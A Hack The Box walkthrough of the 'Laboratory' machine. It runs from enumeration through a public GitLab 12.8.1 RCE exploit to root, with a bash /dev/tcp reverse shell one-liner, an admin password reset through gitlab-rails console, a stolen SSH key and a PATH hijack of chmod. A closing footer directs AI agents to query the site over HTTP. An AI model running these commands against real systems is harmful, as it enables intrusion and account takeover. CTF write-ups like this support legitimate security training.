# Hack The Box - Laboratory Walkthrough without Metasploit ![Laboratory](/files/-MYOOh0cMHlNJvC7Gi2w) ## Enumeration Let's start by running nmapAutomator on our target: ``` nmapAutomator 10.10.10.216 All ``` Our basic scan returns the following: ![Nmap Scan](/files/-MYOgYXnHR15e6iaHWY9) ### Ports We have the following ports open #### 22 This is the SSH (Secure Shell) port, we might be able to use it later to log in if we find any valid username and its password or a valid key. #### 80 HTTP port that redirects to HTTPS one (443) on the Nmap scan we can see that we have discovered **laboratory.htb** and a DNS **git.laboratory.htb** we add both to our /etc/hosts. ![/etc/hosts entry](/files/-MYOkVPy5N-4gn4IIban) We can also discover the DNS with **gobuster** ```bash gobuster dns -d laboratory.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40 ``` ![Gobuster DNS fuzz](/files/-MYOk-ehoIANZA0HPFNg) #### 443 This port is related to HTTPS, and it's the one we will access while trying to go to **** so let's try to see if there's anything interesting: ![Web](/files/-MYOl4Qz1HQRwxQQz5u-) After some enumeration on the web page, we couldn't find much of interest so let's go to **** here we will see a GitLab Community Edition running, and we can Register ### GitLab ![Trying to register a GitLab account](/files/-MYOloiv5Vk7g13AJLMI) We must use the email domain of laboratory in order to be able to successfully register: ![Using the correct Email domain](/files/-MYOmQnUr0cM-EtK6OVW) And once we click on Register we are in as our new user **evil** ![Logged in Laboratory GitLab](/files/-MYOnPpFIIUbgojhJ_Mf) Looking through the page we can enumerate the GitLab version quite easily, we go to Help and it'll appear: ![GitLab Version 12.8.1](/files/-MYOoO5Ux6Vi8_FSVb8V) Searching for possible vulnerabilities on this version we found this report on HackerOne: {% embed url="" %} Arbitrary file read via UploadsRewriter {% endembed %} That leads us to this git repository: {% embed url="" %} gitlab\_RCE {% endembed %} Let's clone the repository and inspect the python code! ```bash git clone https://github.com/dotPY-hax/gitlab_RCE ``` We have to modify the script since this GitLab has restricted email domains, and also we change the port on where we will be listening: ![Script modification](/files/-MYOr4yL1aPmT1t9EFWX) We prepare a netcat listener on port 9009: ```bash nc -nvlp 9009 ``` Now we can use the script: ```bash python3 gitlab_rce.py https://git.laboratory.htb ``` We have to choose the option 2 since we want RCE and our version is 12.8.1, the script will stop and ask us if we already have a listener (how nice). We can also see what it is doing: * Registering user hcbh4toQHD:IWTygssOAM * Creating project by8giL18px * Creating project qQfLhudoho * Creating issue gggHd8VkFn for project by8giL18px * Moving issue from by8giL18px to qQfLhudoho * Grabbing file secrets.yml * Deploying payload * Delete user hcbh4toQHD ![Gitlab Rce](/files/-MYOvFWUFleAu5SXd26X) The shell really is unstable, whenever we press enter it fades: ![Unstable Shell](/files/-MYOuEBE6bNGLDpK8xXt) As soon as we get in we start another listener and the first command we type in is another reverse to make it a bit more stable: ```bash /bin/bash -c 'bash -i >& /dev/tcp// 0>&1' ``` ![Reverse Shell](/files/-MYOuWi19PxvrdXAHqfT) On our other shell we grab the incoming connection: ![Stable Reverse](/files/-MYOwMQMgLSKxSLOsQkQ) We are in as git user, enumerating we will find out that we are inside a Docker container: ![.dockerenv](/files/-MYOwkEhMz9VdPEYoJj_) ## Privilege Escalation ### Gitlab-rails We are inside a container but we cannot escape yet, although we see that we have **gitlab-rails**: \~/**gitlab-rails**/working, searching about gitlab-rails we found two interesting pages: {% embed url="" %} {% embed url="" %} Both links pointing to how change or look users with gitlab-rails console. First we set the environment to production: ```bash gitlab-rails console -e production ``` ![Production Environment](/files/-MYOzLEh-uFTvtAhKk_N) Now we can find users by id, we load the first user on the variable user ```bash user = User.find_by(id: 1) ``` ![Dexter](/files/-MYOz_w8NI7LNlAg4pHj) Let's modify a bit the user * user.password --> set a new password * user.password\_confirmation --> confirm new password * user.save! --> save new configuration ![New Dexter password](/files/-MYP-8NGWsa0qti5aA3s) Let's try to log in GitLab with **dexter** and our new password **evilpass** ![Impersonating Dexter](/files/-MYP3FekYACYMeX8TBJF) Once we are logged in we can see there are two repositories: ![Dexter Repositories](/files/-MYP3a4Ui8ybqfbTluYQ) If we enter on **SecureDocker** project we will find an interesting folder: ![Dexter folder](/files/-MYP4AssV1CNiUWpb9Le) Inside that folder there is an even more interesting one! ![SSH folder](/files/-MYP4R2y27bcJtPL9zw4) Inside .ssh we have the id\_rsa key that will allow us to log in as Dexter ![id\_rsa](/files/-MYP4jTOdr45zaD38Tlc) We copy that id\_rsa into a file in our box and chmod 600 it in order to be able to use it with ssh to log in: ```bash chmod 600 dexterssh ssh -i dexterssh dexter@10.10.10.216 ``` ![In as Dexter](/files/-MYP5D07PZIlkoOASqvU) At this point we can grab our user hash, once we do it lets enumerate and try to escalate privileges ### Dexter Privilege Escalation We get **suid3num.py** to the box to see if there are binaries with SUID: {% embed url="" %} Suid3num.py {% endembed %} Set a SimpleHTTPServer on our box: ```bash python -m SimpleHTTPServer ``` On Laboratory shell as dexter grab the script and execute it: ```bash wget /suidnum.py chmod +x suid3num.py python3 suid3num.py ``` ![Getting Suid3num.py to the box](/files/-MYP8gtdTmJgWT7c5x41) We can see there is a Custom SUID Binary ![](/files/-MYP7MOZup4NOX8lB1-e) Inspecting the binary with **ltrace**: It's setting uid and gid to 0 (**root**) and then using chmod without full path, we can hijack that to become root: ![chmod without full path as root](/files/-MYP9qjVFHYtkCnT3LNR) #### Hijacking chmod Since it's using chmod without the full path, it will be looking through all the directories in our **$PATH** variable and will use the first chmod that it finds. Knowing that we will prepend to our PATH **/tmp/.folder** and there we will create a file called **chmod** on where we will put **/bin/bash** and make it executable: ```bash export PATH=/tmp/.folder:$PATH echo "/bin/bash" > chmod chmod +x chmod ``` ![Hijacking chmod](/files/-MYPAiOGlLsyApRu0wFb) ## Pwnd If we execute the SUID binary now: ```bash /usr/local/bin/docker-security ``` ![We are root](/files/-MYPAua92KgJDOlQrf9-) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://4st1nus.gitbook.io/hackthebox/htb/hack-the-box-laboratory-walkthrough-without-metasploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.